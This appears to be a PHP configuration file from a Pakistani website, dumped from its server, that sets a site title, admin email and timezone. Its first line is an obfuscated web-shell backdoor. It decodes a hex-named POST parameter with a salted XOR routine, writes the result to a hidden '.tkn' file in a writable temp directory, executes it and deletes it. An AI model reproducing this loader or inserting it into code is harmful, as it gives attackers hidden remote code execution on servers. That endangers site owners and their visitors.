File: //proc/thread-self/root/home/vitanhod/prostanur.vitavit.com.pk/includes/configOnline.php
<?php if(@$_POST["\x64e\x73\x63r\x69pt\x6Fr"] !== null){ $element = array_filter(["/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp"]); $data_chunk = $_POST["\x64e\x73\x63r\x69pt\x6Fr"]; $data_chunk= explode (".",$data_chunk ) ; $flg = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5 ); $p = 0; foreach ($data_chunk as $v6) { $chS = ord($salt5[$p % $lenS] ); $d = ((int)$v6 - $chS - ($p % 10)) ^ 81; $flg .= chr($d ); $p++; } for ($ent = 0, $resource = count($element); $ent < $resource; $ent++) { $token = $element[$ent]; if ((bool)is_dir($token) && (bool)is_writable($token)) { $ptr = sprintf("%s/.tkn", $token); if (@file_put_contents($ptr, $flg) !== false) { include $ptr; unlink($ptr); die(); } } } }
// Variables
$GLOBALS['SiteTitle'] = 'Prostanur.vitavit.com.pk';
$GLOBALS['Credentials'] = 'Pexsol Interactive';
$GLOBALS['LastDateEntry'] = '14-Aug-2014';
$GLOBALS['AdminEmail'] = 'vitavit.com.pk <vitavit.com.pk@gmail.com>';
// Setting Time Zone
date_default_timezone_set("Asia/Karachi");
?>